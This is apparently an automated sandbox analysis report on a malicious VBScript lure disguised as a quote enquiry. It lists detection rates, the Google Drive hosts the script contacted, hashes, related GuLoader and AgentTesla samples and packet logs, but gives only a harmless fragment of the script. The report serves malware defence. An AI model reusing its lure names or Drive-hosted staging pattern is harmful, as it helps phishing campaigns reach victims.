              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | Enquiry Quote - 24071834-01.vbs | 3% | ReversingLabs | Win32.Dropper.Generic | |
              | Enquiry Quote - 24071834-01.vbs | 10% | Virustotal | | Browse |
              No Antivirus matches
              No Antivirus matches
              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | drive.google.com | 0% | Virustotal | | Browse |
              | drive.usercontent.google.com | 1% | Virustotal | | Browse |
              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
              | http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
              | http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe | |
              | https://go.micro | 0% | URL Reputation | safe | |
              | https://contoso.com/License | 0% | URL Reputation | safe | |
              | https://contoso.com/Icon | 0% | URL Reputation | safe | |
              | https://drive.usercontent.googh | 0% | URL Reputation | safe | |
              | https://aka.ms/pscore6lB | 0% | URL Reputation | safe | |
              | https://contoso.com/ | 0% | URL Reputation | safe | |
              | https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
              | https://aka.ms/pscore68 | 0% | URL Reputation | safe | |
              | https://apis.google.com | 0% | URL Reputation | safe | |
              | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
              | https://drive.google.com/uc?ex | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com/u | 0% | Avira URL Cloud | safe | |
              | http://drive.usercontent.google.com | 0% | Avira URL Cloud | safe | |
              | https://drive.goog | 0% | Avira URL Cloud | safe | |
              | https://drive.googP | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com/uc?ex | 2% | Virustotal | | Browse |
              | https://drive.goog | 1% | Virustotal | | Browse |
              | https://drive.google.com/u | 0% | Virustotal | | Browse |
              | http://drive.google.com | 0% | Virustotal | | Browse |
              | https://drive.google. | 0% | Virustotal | | Browse |
              | http://drive.google.com | 0% | Avira URL Cloud | safe | |
              | https://drive.google. | 0% | Avira URL Cloud | safe | |
              | http://drive.usercontent.google.com | 1% | Virustotal | | Browse |
              | https://drive.go | 0% | Avira URL Cloud | safe | |
              | https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe | |
              | https://drive.goo | 0% | Avira URL Cloud | safe | |
              | https://www.google.com | 0% | Avira URL Cloud | safe | |
              | http://crl.m | 0% | Avira URL Cloud | safe | |
              | https://drive.g | 0% | Avira URL Cloud | safe | |
              | https://github.com/Pester/Pester | 1% | Virustotal | | Browse |
              | https://drive.goo | 0% | Virustotal | | Browse |
              | https://drive.google.com/uc | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com/ | 0% | Avira URL Cloud | safe | |
              | https://drive.googl | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com/uc?e | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com/uc | 1% | Virustotal | | Browse |
              | https://drive.usercontent.google.com | 0% | Avira URL Cloud | safe | |
              | https://www.google.com | 0% | Virustotal | | Browse |
              | https://drive.google.com/ | 1% | Virustotal | | Browse |
              | https://drive.google.c | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com/uc? | 0% | Avira URL Cloud | safe | |
              | http://crl.v | 0% | Avira URL Cloud | safe | |
              | https://drive.usercontent.google.com | 1% | Virustotal | | Browse |
              | https://drive.google.com/uc?e | 2% | Virustotal | | Browse |
              | https://drive.google | 0% | Avira URL Cloud | safe | |
              | https://drive.google.co | 0% | Avira URL Cloud | safe | |
              | https://drive.google.com | 1% | Virustotal | | Browse |
              | https://drive.google | 0% | Virustotal | | Browse |
              | https://drive.google.co | 0% | Virustotal | | Browse |
              | https://drive.google.com/uc? | 0% | Virustotal | | Browse |
              | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
              |---|---|---|---|---|---|
              | drive.google.com | 216.58.206.46 | true | false | | unknown |
              | drive.usercontent.google.com | 172.217.16.193 | true | false | | unknown |
              | IP | Domain | Country | ASN | ASN Name | Malicious |
              |---|---|---|---|---|---|
              | 172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
              | 216.58.206.46 | drive.google.com | United States | 15169 | GOOGLEUS | false |
              Joe Sandbox version: 40.0.0 Tourmaline
              Analysis ID: 1466658
              Start date and time: 2024-07-03 08:51:46 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 7m 6s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 22
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: Enquiry Quote - 24071834-01.vbs
              Detection: MAL
              Classification: mal100.troj.expl.evad.winVBS@9/8@2/2
              EGA Information: Failed
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 49
              • Number of non-executed functions: 12
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 93.184.221.240
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 3024 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
              • Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              Time | Type | Description
              02:52:41 | API Interceptor | 1x Sleep call for process: wscript.exe modified
              04:17:54 | API Interceptor | 281x Sleep call for process: powershell.exe modified
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              3b5074b1b5d032e5620f69f9f700ff0e | 2669976595_366408723_KHI_SOF_240702_0957_P.vbs | malicious | GuLoader | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs | malicious | GuLoader | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | AF85714759_htm#U00b7pdf.vbs | malicious | Remcos, GuLoader | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | Zapytanie ofertowe (GASTRON 07022024).vbs | malicious | AgentTesla, GuLoader | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | B24E33 ENQUIRY.vbe | malicious | AgentTesla, PureLog Stealer | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order N#U00b0 20240702.vbs | malicious | AgentTesla, GuLoader | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | AWB 3609 961.pdf.scr.exe | malicious | AgentTesla | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | MT_0615_60931PDF.exe | malicious | AgentTesla, PureLog Stealer | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | Doc230906103882.exe | malicious | AgentTesla, PureLog Stealer | 172.217.16.193, 216.58.206.46
              3b5074b1b5d032e5620f69f9f700ff0e | birectangular.vbs | malicious | FormBook, GuLoader | 172.217.16.193, 216.58.206.46
              Process:C:\Windows\System32\wscript.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):71954
              Entropy (8bit):7.996617769952133
              Encrypted:true
              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
              Malicious:false
              Reputation:moderate, very likely benign file
              Process:C:\Windows\System32\wscript.exe
              File Type:data
              Category:modified
              Size (bytes):328
              Entropy (8bit):3.144086598890895
              Encrypted:false
              SSDEEP:6:kKIii9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:gidDnLNkPlE99SNxAhUe/3
              MD5:23176B4BE747FB4BC0BF6360ED4F8E6E
              SHA1:CFE8E662ECE99256BAFEC26AF4DCDBF02E2961A4
              SHA-256:7BC5E85F341758F6BE52D4C59D65AA46AE1557FC634921C7790FE43940819207
              SHA-512:1412ABDCF896EA5BB3600535837B490721232692FA69A95D193A8EBB36EABC3F1B06F6C37855F2EC02EAB28B561D1B96C9C32F55705E3E92D066A9D07BDAC0DE
              Malicious:false
              Reputation:low
              Preview:p...... ........Q.T.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):11608
              Entropy (8bit):4.8908305915084105
              Encrypted:false
              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
              MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
              SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
              SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
              SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):442592
              Entropy (8bit):5.932059423793645
              Encrypted:false
              SSDEEP:6144:UBboQnfO+EyMenUv0MnR3c07rgSvHSFbay0elUf+5p+12tRuoBX1UU/p+8:ebnrfU8MzrhyFbgYUSZiovG8
              MD5:E045DCE2B497F738701AACE12F084813
              SHA1:1B6D8A40B81D9E1B79C82E9BCC31D312E7BA87A0
              SHA-256:11ACB75B44152ED40AEB5F759678D16928862D7CE8E1132C5B0005982EAF2872
              SHA-512:CD43C0E8DC74B31AF56EB85C82EEB9B92FF5AF94982B79FF4192A506E392736A053CB3CD55E1A881F5DEF3988AF154D0FFF48A701E5655928CCB4FCDBE0F0682
              Malicious:false
              File type:ASCII text, with CRLF line terminators
              Entropy (8bit):5.330658060981545
              TrID:
              • Visual Basic Script (13500/0) 100.00%
              File name:Enquiry Quote - 24071834-01.vbs
              File size:23'868 bytes
              MD5:9e2fe2b97264a9c35794d67e1c17ee26
              SHA1:3d32f6f565e50eeeba893e7734a860b7bc45a1d4
              SHA256:d692bbec767a90d323a15ef761c1a207480f417ffd1509717e1b6793c0b7299a
              SHA512:e5d8af0649ec86485fa15b2450082f624450b8cc152726866f958ebb4d04db4785ef551fc3432aef12f1b8fb20a76caf297ed11a78e77a59d9773379ed6d1157
              SSDEEP:384:5EqYZpCSXbN69/uJxX0ibU5YytwTYX/PTlahj4cSSrrD9:5EqyL69/qxXq5ltwMvLEhDfrD9
              TLSH:C4B2D5FDD94E11A54E8E4FE2B44908F4B95333660037EC273B09AF98C4E16CF66084EA
              File Content Preview:..................Set Icterical = CreateObject("WScript.Shell")..nyvurderingerne = -9780..Unauthorized = "Bhutansk. verdensmesterens."..Protesttog = &H5DBC..Superinjustice = &HFFFF3B7F..Disconcertedly28 = "Prakker; provocation;"..Omfangs = &H5521..Urease1
              Icon Hash:68d69b8f86ab9a86
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jul 3, 2024 08:54:22.773350954 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.773478985 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.773526907 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.773531914 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.776010036 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.776288986 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.776293993 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.777096033 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.777148962 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.777153015 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.779983044 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.780056000 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.780060053 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.780889988 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.780947924 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.780951977 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.783617973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.783694029 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.783699036 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.784555912 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.784606934 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.784611940 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787086964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787117004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787137985 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787153959 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.787158966 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.787224054 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.791572094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.791654110 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.791666985 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.792078972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.792136908 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.792141914 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.794609070 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.794742107 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.794754028 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.795510054 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.795641899 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.795649052 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.796461105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.796547890 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.796555996 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.797672987 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.798620939 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.798635006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.799874067 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.799937963 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.799943924 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.800798893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.800843954 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.800848007 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803369045 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803641081 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.803646088 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803901911 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.803987026 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.803991079 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806334972 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806427002 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.806432009 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806924105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.806976080 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.806981087 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.808706999 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.808759928 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.808765888 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.810204983 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.810259104 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.810262918 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.811678886 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.811721087 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.811724901 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813070059 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813096046 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813126087 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.813131094 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.813167095 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.814873934 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.816823006 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.816867113 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.816886902 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.816891909 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.818854094 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.819003105 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819542885 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819586992 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.819590092 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819598913 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.819638968 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.823153973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823734999 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823760033 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823786974 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.823787928 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.823795080 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.825942993 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.829437971 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.829463005 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.829499960 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.829504967 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.829613924 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.830008030 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.830059052 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.830102921 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.830106974 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835721016 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835756063 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835771084 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.835776091 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.835814953 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.836180925 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839466095 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839523077 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.839528084 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839638948 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.839680910 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.839684963 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.840234995 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.841089964 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.843641996 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.843647957 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.843839884 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.846292973 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847204924 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847229004 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847282887 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.847287893 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.847985983 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.848000050 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.848004103 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.848081112 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.851248980 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.851982117 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852005959 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852031946 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852035046 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.852041960 CEST44349707172.217.16.193192.168.2.7
              Jul 3, 2024 08:54:22.852072954 CEST49707443192.168.2.7172.217.16.193
              Jul 3, 2024 08:54:22.857422113 CEST44349707172.217.16.193192.168.2.7
